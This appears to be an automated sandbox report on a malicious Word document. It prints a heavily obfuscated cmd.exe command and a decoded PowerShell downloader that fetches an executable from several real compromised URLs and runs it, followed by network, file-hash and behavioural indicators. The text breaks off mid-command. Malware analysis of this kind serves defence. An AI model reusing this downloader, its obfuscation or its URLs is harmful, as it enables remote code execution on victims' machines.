//_\/\_----/__\F_\_-__///\\/\--J_//-_//\--__\\-c_-\-__\//-\//_-$\_//__\-/_\/-\-;_/\//_-\_\\/_--)__/__-/-\\\-/\/'_\_///--/\-\-\_@\-/\/\_/-\-__-_'//\\\_--\-/__-_(/-/_/_-\\_\-\/-t--_\/\\-_\-///_i\_/-_/-\_/\-_\/l/-_//--\__\/_-\p\/\_\--_//_/_--S_-/\-\\-//-__\_.\-/_\--\/_/_/\_'_--\__//-/\/-\\C\--/\_-_\/\-/_/S/_\\\_/__\/--/-4\-\\\/_---___//6/-\/_/_-_\/\-\_K/-_-\__/-\/_\\/O\/--__\_//_/\--P/\_/_-//-\\__--M\\--_--\/_///_\/_/\/\___/\--/--m_/_-/_\\_\-/--\o-_\-/_/\_\-\_-/c__\/\_-\-_-/-//._//\_//\\_--\_-g-/\_/\-/\-_-_\/n_//\/-/-\_-_\\_i_\\---/\/-/\/__v__-/\//-_\-_\-/o_\_-/-/\-\/\_-/m_-/\/_\_/-\-/\-a_-\/_\/-_-//\_\l--\_\_\/_-\/-//l--___\-/\\/-//_e\_-__-/\--//\_\s\-/__-\/\-__-/\a/-__\/\/\/-\-_-c////_\-\_-\_-\_/-/__\\\\_-//-/_/-\//_\-\-/__-/\:__-/_\_---///\\p\\_//_-\--\__//t-//\--\/__\/\_-t-/-\_\\_//-_/-_h/-\-/\\__/-/_-\@-/_\//_\-_\-/\_6_\\/\---\/-_//_X_--\/\-///-___\1/__\\-/_-/\_-\-i\--\/_-/\\-/_/_f--\///_\/\\_-_-6/----_\__/\_\/\P_\\_-_\//_\/---/-//-/_\-\-_\_/\m\/\_/\//__-\_--o/\-\_-/\__\-_//c--_\_\_/-/-\//_.-/__\/__\\-//-\a-\_-/__-/\/\_-/i\_/\\_-///\_-_-d\_-\\-_//_\/_/-e\/_--//_/\_\-\_m_\\-__/\\//_-/-l/-\//\\-_--\___o/\\-\-___/-\_//o\-\/__/_---\/_\c//-_\__-/\\/\-_c\_/\/_-/_\--/-_/__\__-\\-/\-////-\//__/_--\-/_\:_--//_\_\\-\_/-p__-\\/-///_-\-_t\\--\/_/_-_/\-_t_--\\-/_-\_\_//h-/\_--_///\_\_-@_\//-/-__\\/\-_h//\\-_-__--\/\_e\-_/-\_/\-\/-_/o_\/-/__\\/\--/-/-\-_/_-_/\\-_\/s//-\\\//___-\-_u\/_\-/\-/--/__\.\-/-\/_\/__/\--z_-/--/\__\/\/\-i\/-_-_\\__-\/-/b\/_--\/_\--/__\u/-/\/--__/_-_\\s/\-\__-/_-/-\/_c\_-///_-_/-_\-\/_--//--/\\__\/_///\-/-__\\-\/_-:-_\-\/\//___--\p-_//\-\_--\/__/t\_/\_-\-/_/_\--t_/--_\--/\\\_//h_/_//-_\\\-\_-/@/_/---\/\_\__-/K_/\\-_/-\/-__-/a_/_\\_/---\/\_-/_--/\//--__\\\/t_\-/\_\-//_\/-_a-\/--_\/\\___-/p_\-_//--\/\/\-_m\-_\///-_\-_-_\o\/__--/--\_\_//c-\//_--_\\__-/\_///_--\/\\_\--_m_-\//-_/-_\/\-\o/___-\/\\\--/-/d-_//\\_\_-\-/-/n\//_-__/_\\/--\a/\_\/-_/--_-/_\r/--\__/-\-_\\///_/-/-/--_\_\_\\s/_-_-_\--\\\//_e-\-/_/_-_-/\/\\d\\-/\-_/\--___/u\__-/\_\//-\--_l_\-\/-\//_/__\-c--_\\_/_//\/_--n-_\\\_-__/\//--i\__--\-_////-\\----\\_/__/\-/\_p-\/_-\/___-\//-w/\_--/\\_-_/-_//_--\--\//___\//r/_/\-/-/_\-_\-\b__\/\//-_-_-\-/.-\/_-_//_\/-\-\m-//\-\__/-\-__/o_\\_///_-_-\\--c-_-__--//\_\\//.-////_\\_\--_\_o\-___\/\-/\--//i/-\-\\___\-///-d\\/_/-\_\//--_-a/_\\----///___\r__\-\\_///_--/-o/__-\_/-/-\/_\\d/_/\_---\\\/-_/s\//_-_\_--//_\\e/--\_\_\_-/_\-/u_/\-__\--\/\/_-q_\\-/-\_/\_/-/_a//\--_/-\-\__\/r\-\\//\-___-_-/c-_-_\_/\/-/_/\\//_\-/_\/-\-__/-/-\\__-/-_\//_/\:-\-/\/__//_\_-\p_-/__/_/-\\/\\-t/--_/\/-\__/\-_t-/-__\_\--\_//\h-/--\____\\-//\@/\-\-\/\_//-__-X\_\/-\-_-_\//-/0_\\-_-//\/\_-_/M\\-\-_\__-//-_/n___\_\-\-/\/--/E/\/-\-_\_//-_\_/\-\/-_\-/-___\/m-_-_/_\-\-//_/\o-/\__\_\/-/-/\_c-/\\/-_--_\/_\/.\\\_//-_//_---\e\/-\\-__/-/_/\_n//---__\\/\_\-_i\\_\_---///\_/_l__//_-\\--\_\-/n/-___/\-/_/-\\-o___--//-\\\-//\h/\-\/\__/-/-__-n-\\_\--_//-__//i\__-_\\-\--_///m/__/\-\_/\/\--_o_/\-_-\\__\-//-a_/-/\\\-/__\-/-b-\_-_/_-//_\\-//_/--/-\__/_/-\\//_-__-/-\\-/_\\:-__-\-\\//\//_-p\--/\-_/_-//_\_t-/_-\/_\\_\--//t-\//--_\_\\_//_h-//_\\\-\-___//'\_/_\/_-_-\-\/-=\-\\//\__/_/-_-O-__\_/-\_\-/-//V/-\____-\//-/-\h\/--_-/-/\\_/__$\\/_-_/\-/_/--_;__\/\-//\--__-/t-/_\-/\\_/__/\-n-\/\-/_\/-\_-_/e/---/_\_/-__\\/i\_/_-\\/\-/_-_/l-_\/\-/-/-__\\/C\__\//_\_----//b_-/-\_--\//__/\e-//_\\-/-\-\__/W//\/_\_\__-/-\-._-/__\-/-\-\_//t--_/\\--_//__\/e/\/\/-/_--\\_-_N__\-/\/-/\-/-_\ \//_-_/_--/\-\_t/\/\\/--_--_\/_c\//\__//-\\--_-e-/\-__-_\_/\-\/j-_\//_-\-/\_-\/b-__\\_/\/---_//o_\-/\__/-/-\-_\--_\/\_-\\/--/_/w__///_--_\\\\/-e_\--\__//-_\\/-n\_\/_---\/_\-//=/\/\\_/_/_-_--\j_/-_/-\/-\__\-/L_\-\-///-___\-/h_\_/_-///_---\\$_-\/_/\/-_-\-\_ _-_--/\\//-_/_\l/---/\/\\\/____l/---\_/\_-//__\e/-/\\_/--__/\_-h-_//\/-\\__-/-_s-/_-\_-_\\\-//_r/_/\/_\-/\-__--e-_\--/_//\\\-_/w//\___\/_\/----o\/__-_\-\\/-_/-p&& for /l %D IN ( 6143 ,-16 ,15) dO SEt .`=!.`!!~'{:~%D, 1!&& iF %D == 15 cAlL %.`:~ -384% "
C:\Windows\SysWOW64\cmd.exe
cmD.Exe /V:O /R " set ~'{=-_\--/_-///\\__ /__\\_\-_/-/-\/ _/_-/_-/-_\-/\\ \\--//_-\__/\-_ _\\_////\--_\-- \_/-__-\/_-\\/- \-\\_-/__///\-- /_\/-/-\_-\-/__ \-//_//_--\\_\_ _-\\-_-\///_/-_ _\-/-/_\/-\_/-_ \__\--////\\-__ -/\__/\/-\\-__/ -__/\\-/-_\\/-_ /---\\/\\/-___/ //_\-\/_--/_\_\ //_--\_\_-\/-_\ /\__\--/_/-\\-/}\\__//_//-\---\}-/\\\\/__--//_-{-_-\_//\--\/\_/h/\/-\_-/-/__\-_c_-_/__-/\/\\-\/t_-/\\/_-_-\/\/-a-/--_//\-\\\_/_c_\-/_\_/\--\//_}/-\_\\//_-\-__/;\//---\_/_/\_-_k-_-//\__/\\_/\-a\--_-\\/__/_-/\e/-__\\_--/\\/-_r/\---_\\//\___-b\__/\_/\/----\/;-\_///_-\-\_-_\i-_\/_--\\/\_/-_s__/\\_-/\/_-\/-w/\\-_-_/_--\/\/$_\--__/\/-/_\\- /\-_//\-\\/-__-s-/\_-/-\_\_/-\_s\\_/-__\_//-/-\e\/\-_-_\\///__-c\_\-_-\\_//-//_o/\/-/\/-_\_\--_r_/_-\/__\--\//-P\\_-\\-/-_/-_/_-\\--//\___/_/--t_-___\---/\///\r_//\_-\-/__/-\-a/_/\_\/-\-/-\-_t\/\//_--__\-/\-S_/_\/--\/\_--_\;\-__\_/\_/\/--/)/\--\-_//_\-__\i--\_/-\\/__/-/\s/\/-\\--\__//__w-_\-\-_/__/-\/\$/-/__\-\_\//-_- \__\_-_--//-\\/,__-_\_//-\//\-\z\\--\/-_/_-/__/W/-\//-\_/\\-___A_\__\//--/--/_\$///_\-__\\-\/-_(/_-_\_-\/\-\_-/e_/-\-\_-//\_-\_l\//\/_-_--\_/-_i/-__\\__-\\/--/F\---//__\\//-\_d\_/__\---/\-\//a/_-\\/_\/--\__-o-/-_/\-_/\\/-_\l\//-\_\_-/-\-/_n-__-\/\/-\/_/\-w_-/\/\-__\\-/-_o/-_-__/-\_\-/\/D-_-_/\\-/_/_/\-.\_\//-/--_\-/__j-//-_\_-/\/\\-_L--/\__\/-\_\_/-h\/-_/_--/__-/\\$_-_\/-\/\-_/_/\{/\-\\\//_-_/_--y_\__//\/_-\---\r/----/____\\\/\t\--//\/_/__-_\-{\\-/_-\\_/-/_-_)-/__-///\_-\\-_O\_/\--/-_-_/\_/V--__\\--\//_/_/h_/---\/_\-/\_\/$/_\/\//-__--\_- _\/_\--_\_/--/\n/\\-\-_-_/-\_//i\__\---/\//_\-_ \\\/\__-/_/--_/z\\_/-/-/\-_\/-_W_\_/\-_/-_-/\-\A\-///_/\__--\\_$-_-//_--\/\/\_\(_-/\\_--//-/\\_h/\__\//-_\--\/_c\_/_--_-_-\/\\/a_\/_//\-_/\_---e-\_/-_-_\\_\///r\/--_\/__\\//_-o-/_\\_-_//-_/\\f/_\-\\/-_\--//_;/_-_\__-\-/\/\/'-/\\-\__//-/_-\e\_\-/--//\-__/\x//\_/_--/-\_\-_e/\\//-_--_\-\_/.\_\//_--/-\\/__'_\/-_-_-///\\\_+/_\-\/_/-_-\\/-F-/\_-__\\/\--//J\\/__\-/\/_-/_-c//\\_-/-_-_-\/\$-/-\/\_-/__-\/_+/-\_\_-_/_/\/--'/-_-\\/\-\__/_-\\_--\\_-//\//_-'//\-_--/\-/\\__+-\_-\__\/_\//-/p/\/__\//\_-\--_m\\-_-/-\/__/-_\e-/__\\/-_-\/_-\t/-_-/-_/\\_/\-_://_\\\_---/\-_/v_\/\-\-/_/_\_--n\/-_\-_-//_/-\\e_/-\//\_-\--_/_$__-//\--_\_\/-\=/\-_\\-/_-/_/_-i/-\/_\-_-_\/-_\s--/_/-__-/\_\\/w__-/--\\-_//\/\$/\_/--/_/\__-\-;_/--/-_/-\\__/\'_-\//\_\-_-/-_/4-/-_-/_\\-\\/__7_--_/\_/-/-\\\/9\_/\_/----\__//'-/-/\/_\--__\/_ _/\/\-\_/-/-__\=_\_\_--\/--_//\ //_\/\_----/__\F_\_-__///\\/\--J_//-_//\--__\\-c_-\-__\//-\//_-$\_//__\-/_\/-\-;_/\//_-\_\\/_--)__/__-/-\\\-/\/'_\_///--/\-\-\_@\-/\/\_/-\-__-_'//\\\_--\-/__-_(/-/_/_-\\_\-\/-t--_\/\\-_\-///_i\_/-_/-\_/\-_\/l/-_//--\__\/_-\p\/\_\--_//_/_--S_-/\-\\-//-__\_.\-/_\--\/_/_/\_'_--\__//-/\/-\\C\--/\_-_\/\-/_/S/_\\\_/__\/--/-4\-\\\/_---___//6/-\/_/_-_\/\-\_K/-_-\__/-\/_\\/O\/--__\_//_/\--P/\_/_-//-\\__--M\\--_--\/_///_\/_/\/\___/\--/--m_/_-/_\\_\-/--\o-_\-/_/\_\-\_-/c__\/\_-\-_-/-//._//\_//\\_--\_-g-/\_/\-/\-_-_\/n_//\/-/-\_-_\\_i_\\---/\/-/\/__v__-/\//-_\-_\-/o_\_-/-/\-\/\_-/m_-/\/_\_/-\-/\-a_-\/_\/-_-//\_\l--\_\_\/_-\/-//l--___\-/\\/-//_e\_-__-/\--//\_\s\-/__-\/\-__-/\a/-__\/\/\/-\-_-c////_\-\_-\_-\_/-/__\\\\_-//-/_/-\//_\-\-/__-/\:__-/_\_---///\\p\\_//_-\--\__//t-//\--\/__\/\_-t-/-\_\\_//-_/-_h/-\-/\\__/-/_-\@-/_\//_\-_\-/\_6_\\/\---\/-_//_X_--\/\-///-___\1/__\\-/_-/\_-\-i\--\/_-/\\-/_/_f--\///_\/\\_-_-6/----_\__/\_\/\P_\\_-_\//_\/---/-//-/_\-\-_\_/\m\/\_/\//__-\_--o/\-\_-/\__\-_//c--_\_\_/-/-\//_.-/__\/__\\-//-\a-\_-/__-/\/\_-/i\_/\\_-///\_-_-d\_-\\-_//_\/_/-e\/_--//_/\_\-\_m_\\-__/\\//_-/-l/-\//\\-_--\___o/\\-\-___/-\_//o\-\/__/_---\/_\c//-_\__-/\\/\-_c\_/\/_-/_\--/-_/__\__-\\-/\-////-\//__/_--\-/_\:_--//_\_\\-\_/-p__-\\/-///_-\-_t\\--\/_/_-_/\-_t_--\\-/_-\_\_//h-/\_--_///\_\_-@_\//-/-__\\/\-_h//\\-_-__--\/\_e\-_/-\_/\-\/-_/o_\/-/__\\/\--/-/-\-_/_-_/\\-_\/s//-\\\//___-\-_u\/_\-/\-/--/__\.\-/-\/_\/__/\--z_-/--/\__\/\/\-i\/-_-_\\__-\/-/b\/_--\/_\--/__\u/-/\/--__/_-_\\s/\-\__-/_-/-\/_c\_-///_-_/-_\-\/_--//--/\\__\/_///\-/-__\\-\/_-:-_\-\/\//___--\p-_//\-\_--\/__/t\_/\_-\-/_/_\--t_/--_\--/\\\_//h_/_//-_\\\-\_-/@/_/---\/\_\__-/K_/\\-_/-\/-__-/a_/_\\_/---\/\_-/_--/\//--__\\\/t_\-/\_\-//_\/-_a-\/--_\/\\___-/p_\-_//--\/\/\-_m\-_\///-_\-_-_\o\/__--/--\_\_//c-\//_--_\\__-/\_///_--\/\\_\--_m_-\//-_/-_\/\-\o/___-\/\\\--/-/d-_//\\_\_-\-/-/n\//_-__/_\\/--\a/\_\/-_/--_-/_\r/--\__/-\-_\\///_/-/-/--_\_\_\\s/_-_-_\--\\\//_e-\-/_/_-_-/\/\\d\\-/\-_/\--___/u\__-/\_\//-\--_l_\-\/-\//_/__\-c--_\\_/_//\/_--n-_\\\_-__/\//--i\__--\-_////-\\----\\_/__/\-/\_p-\/_-\/___-\//-w/\_--/\\_-_/-_//_--\--\//___\//r/_/\-/-/_\-_\-\b__\/\//-_-_-\-/.-\/_-_//_\/-\-\m-//\-\__/-\-__/o_\\_///_-_-\\--c-_-__--//\_\\//.-////_\\_\--_\_o\-___\/\-/\--//i/-\-\\___\-///-d\\/_/-\_\//--_-a/_\\----///___\r__\-\\_///_--/-o/__-\_/-/-\/_\\d/_/\_---\\\/-_/s\//_-_\_--//_\\e/--\_\_\_-/_\-/u_/\-__\--\/\/_-q_\\-/-\_/\_/-/_a//\--_/-\-\__\/r\-\\//\-___-_-/c-_-_\_/\/-/_/\\//_\-/_\/-\-__/-/-\\__-/-_\//_/\:-\-/\/__//_\_-\p_-/__/_/-\\/\\-t/--_/\/-\__/\-_t-/-__\_\--\_//\h-/--\____\\-//\@/\-\-\/\_//-__-X\_\/-\-_-_\//-/0_\\-_-//\/\_-_/M\\-\-_\__-//-_/n___\_\-\-/\/--/E/\/-\-_\_//-_\_/\-\/-_\-/-___\/m-_-_/_\-\-//_/\o-/\__\_\/-/-/\_c-/\\/-_--_\/_\/.\\\_//-_//_---\e\/-\\-__/-/_/\_n//---__\\/\_\-_i\\_\_---///\_/_l__//_-\\--\_\-/n/-___/\-/_/-\\-o___--//-\\\-//\h/\-\/\__/-/-__-n-\\_\--_//-__//i\__-_\\-\--_///m/__/\-\_/\/\--_o_/\-_-\\__\-//-a_/-/\\\-/__\-/-b-\_-_/_-//_\\-//_/--/-\__/_/-\\//_-__-/-\\-/_\\:-__-\-\\//\//_-p\--/\-_/_-//_\_t-/_-\/_\\_\--//t-\//--_\_\\_//_h-//_\\\-\-___//'\_/_\/_-_-\-\/-=\-\\//\__/_/-_-O-__\_/-\_\-/-//V/-\____-\//-/-\h\/--_-/-/\\_/__$\\/_-_/\-/_/--_;__\/\-//\--__-/t-/_\-/\\_/__/\-n-\/\-/_\/-\_-_/e/---/_\_/-__\\/i\_/_-\\/\-/_-_/l-_\/\-/-/-__\\/C\__\//_\_----//b_-/-\_--\//__/\e-//_\\-/-\-\__/W//\/_\_\__-/-\-._-/__\-/-\-\_//t--_/\\--_//__\/e/\/\/-/_--\\_-_N__\-/\/-/\-/-_\ \//_-_/_--/\-\_t/\/\\/--_--_\/_c\//\__//-\\--_-e-/\-__-_\_/\-\/j-_\//_-\-/\_-\/b-__\\_/\/---_//o_\-/\__/-/-\-_\--_\/\_-\\/--/_/w__///_--_\\\\/-e_\--\__//-_\\/-n\_\/_---\/_\-//=/\/\\_/_/_-_--\j_/-_/-\/-\__\-/L_\-\-///-___\-/h_\_/_-///_---\\$_-\/_/\/-_-\-\_ _-_--/\\//-_/_\l/---/\/\\\/____l/---\_/\_-//__\e/-/\\_/--__/\_-h-_//\/-\\__-/-_s-/_-\_-_\\\-//_r/_/\/_\-/\-__--e-_\--/_//\\\-_/w//\___\/_\/----o\/__-_\-\\/-_/-p&& for /l %D IN ( 6143 ,-16 ,15) dO SEt .`=!.`!!~'{:~%D, 1!&& iF %D == 15 cAlL %.`:~ -384% "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $hLj=new-object Net.WebClient;$hVO='http://baominhonline.com/EnM0X@http://craquesdoradio.com.br/wp-includes/random_compat/aK@http://csubiz.us/oeh@http://ccoolmedia.com/P6fi1X6@http://casellamoving.com/MPOK64SC'.Split('@');$cJF = '974';$wsi=$env:temp+'\'+$cJF+'.exe';foreach($AWz in $hVO){try{$hLj.DownloadFile($AWz, $wsi);Start-Process $wsi;break;}catch{}}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | baominhonline.com | udp |
| US | 8.8.8.8:53 | craquesdoradio.com.br | udp |
| US | 8.8.8.8:53 | csubiz.us | udp |
| US | 8.8.8.8:53 | ccoolmedia.com | udp |
| US | 8.8.8.8:53 | casellamoving.com | udp |
| US | 76.223.105.230:80 | casellamoving.com | tcp |
| US | 76.223.105.230:443 | casellamoving.com | tcp |
| US | 76.223.105.230:443 | casellamoving.com | tcp |
Files
memory/1664-0-0x000000002F0F1000-0x000000002F0F2000-memory.dmp
memory/1664-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1664-2-0x000000007173D000-0x0000000071748000-memory.dmp
memory/1664-6-0x00000000002A0000-0x00000000003A0000-memory.dmp
memory/1664-41-0x00000000002A0000-0x00000000003A0000-memory.dmp
memory/1664-7-0x00000000002A0000-0x00000000003A0000-memory.dmp
memory/1664-84-0x0000000006320000-0x0000000006420000-memory.dmp
memory/1664-151-0x0000000006320000-0x0000000006420000-memory.dmp
memory/1664-1740-0x000000007173D000-0x0000000071748000-memory.dmp
memory/1664-1741-0x00000000002A0000-0x00000000003A0000-memory.dmp
memory/1664-1742-0x0000000006320000-0x0000000006420000-memory.dmp
memory/1664-1743-0x0000000006320000-0x0000000006420000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | b05bb4e3da3053b7db3ee1ee22959dae |
| SHA1 | 9e50fac8322bb847c27f7089c5203ec5896225b3 |
| SHA256 | 1aef690de2f600d07971f3545dc4a05e1f8a9fc004e8106dd51d32076d629c19 |
| SHA512 | 17685061c444012d0ff7a725418cce4cfeca59ac5a590340fa2945e3b0b6036159f4e342b54b4e0d6729932ef87c9a4b15f379a3a756f84baf9569aac73006ea |
memory/1664-1758-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1664-1759-0x000000007173D000-0x0000000071748000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-27 09:08
Reported
2024-05-27 09:11
Platform
win10v2004-20240508-en
Max time kernel
134s
Max time network
131s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1400 wrote to memory of 3940 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\SYSTEM32\cmd.exe |
| PID 1400 wrote to memory of 3940 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\SYSTEM32\cmd.exe |
| PID 3940 wrote to memory of 3984 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 3940 wrote to memory of 3984 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 3984 wrote to memory of 3956 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3984 wrote to memory of 3956 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118.doc" /o ""
C:\Windows\SYSTEM32\cmd.exe
cmd /c cmD.Exe /V:O /R " set ~'{=-_\--/_-///\\__ /__\\_\-_/-/-\/ _/_-/_-/-_\-/\\ \\--//_-\__/\-_ _\\_////\--_\-- \_/-__-\/_-\\/- \-\\_-/__///\-- /_\/-/-\_-\-/__ \-//_//_--\\_\_ _-\\-_-\///_/-_ _\-/-/_\/-\_/-_ \__\--////\\-__ -/\__/\/-\\-__/ -__/\\-/-_\\/-_ /---\\/\\/-___/ //_\-\/_--/_\_\ //_--\_\_-\/-_\ /\__\--/_/-\\-/}\\__//_//-\---\}-/\\\\/__--//_-{-_-\_//\--\/\_/h/\/-\_-/-/__\-_c_-_/__-/\/\\-\/t_-/\\/_-_-\/\/-a-/--_//\-\\\_/_c_\-/_\_/\--\//_}/-\_\\//_-\-__/;\//---\_/_/\_-_k-_-//\__/\\_/\-a\--_-\\/__/_-/\e/-__\\_--/\\/-_r/\---_\\//\___-b\__/\_/\/----\/;-\_///_-\-\_-_\i-_\/_--\\/\_/-_s__/\\_-/\/_-\/-w/\\-_-_/_--\/\/$_\--__/\/-/_\\- /\-_//\-\\/-__-s-/\_-/-\_\_/-\_s\\_/-__\_//-/-\e\/\-_-_\\///__-c\_\-_-\\_//-//_o/\/-/\/-_\_\--_r_/_-\/__\--\//-P\\_-\\-/-_/-_/_-\\--//\___/_/--t_-___\---/\///\r_//\_-\-/__/-\-a/_/\_\/-\-/-\-_t\/\//_--__\-/\-S_/_\/--\/\_--_\;\-__\_/\_/\/--/)/\--\-_//_\-__\i--\_/-\\/__/-/\s/\/-\\--\__//__w-_\-\-_/__/-\/\$/-/__\-\_\//-_- \__\_-_--//-\\/,__-_\_//-\//\-\z\\--\/-_/_-/__/W/-\//-\_/\\-___A_\__\//--/--/_\$///_\-__\\-\/-_(/_-_\_-\/\-\_-/e_/-\-\_-//\_-\_l\//\/_-_--\_/-_i/-__\\__-\\/--/F\---//__\\//-\_d\_/__\---/\-\//a/_-\\/_\/--\__-o-/-_/\-_/\\/-_\l\//-\_\_-/-\-/_n-__-\/\/-\/_/\-w_-/\/\-__\\-/-_o/-_-__/-\_\-/\/D-_-_/\\-/_/_/\-.\_\//-/--_\-/__j-//-_\_-/\/\\-_L--/\__\/-\_\_/-h\/-_/_--/__-/\\$_-_\/-\/\-_/_/\{/\-\\\//_-_/_--y_\__//\/_-\---\r/----/____\\\/\t\--//\/_/__-_\-{\\-/_-\\_/-/_-_)-/__-///\_-\\-_O\_/\--/-_-_/\_/V--__\\--\//_/_/h_/---\/_\-/\_\/$/_\/\//-__--\_- _\/_\--_\_/--/\n/\\-\-_-_/-\_//i\__\---/\//_\-_ \\\/\__-/_/--_/z\\_/-/-/\-_\/-_W_\_/\-_/-_-/\-\A\-///_/\__--\\_$-_-//_--\/\/\_\(_-/\\_--//-/\\_h/\__\//-_\--\/_c\_/_--_-_-\/\\/a_\/_//\-_/\_---e-\_/-_-_\\_\///r\/--_\/__\\//_-o-/_\\_-_//-_/\\f/_\-\\/-_\--//_;/_-_\__-\-/\/\/'-/\\-\__//-/_-\e\_\-/--//\-__/\x//\_/_--/-\_\-_e/\\//-_--_\-\_/.\_\//_--/-\\/__'_\/-_-_-///\\\_+/_\-\/_/-_-\\/-F-/\_-__\\/\--//J\\/__\-/\/_-/_-c//\\_-/-_-_-\/\$-/-\/\_-/__-\/_+/-\_\_-_/_/\/--'/-_-\\/\-\__/_-\\_--\\_-//\//_-'//\-_--/\-/\\__+-\_-\__\/_\//-/p/\/__\//\_-\--_m\\-_-/-\/__/-_\e-/__\\/-_-\/_-\t/-_-/-_/\\_/\-_://_\\\_---/\-_/v_\/\-\-/_/_\_--n\/-_\-_-//_/-\\e_/-\//\_-\--_/_$__-//\--_\_\/-\=/\-_\\-/_-/_/_-i/-\/_\-_-_\/-_\s--/_/-__-/\_\\/w__-/--\\-_//\/\$/\_/--/_/\__-\-;_/--/-_/-\\__/\'_-\//\_\-_-/-_/4-/-_-/_\\-\\/__7_--_/\_/-/-\\\/9\_/\_/----\__//'-/-/\/_\--__\/_ _/\/\-\_/-/-__\=_\_\_--\/--_//\ //_\/\_----/__\F_\_-__///\\/\--J_//-_//\--__\\-c_-\-__\//-\//_-$\_//__\-/_\/-\-;_/\//_-\_\\/_--)__/__-/-\\\-/\/'_\_///--/\-\-\_@\-/\/\_/-\-__-_'//\\\_--\-/__-_(/-/_/_-\\_\-\/-t--_\/\\-_\-///_i\_/-_/-\_/\-_\/l/-_//--\__\/_-\p\/\_\--_//_/_--S_-/\-\\-//-__\_.\-/_\--\/_/_/\_'_--\__//-/\/-\\C\--/\_-_\/\-/_/S/_\\\_/__\/--/-4\-\\\/_---___//6/-\/_/_-_\/\-\_K/-_-\__/-\/_\\/O\/--__\_//_/\--P/\_/_-//-\\__--M\\--_--\/_///_\/_/\/\___/\--/--m_/_-/_\\_\-/--\o-_\-/_/\_\-\_-/c__\/\_-\-_-/-//._//\_//\\_--\_-g-/\_/\-/\-_-_\/n_//\/-/-\_-_\\_i_\\---/\/-/\/__v__-/\//-_\-_\-/o_\_-/-/\-\/\_-/m_-/\/_\_/-\-/\-a_-\/_\/-_-//\_\l--\_\_\/_-\/-//l--___\-/\\/-//_e\_-__-/\--//\_\s\-/__-\/\-__-/\a/-__\/\/\/-\-_-c////_\-\_-\_-\_/-/__\\\\_-//-/_/-\//_\-\-/__-/\:_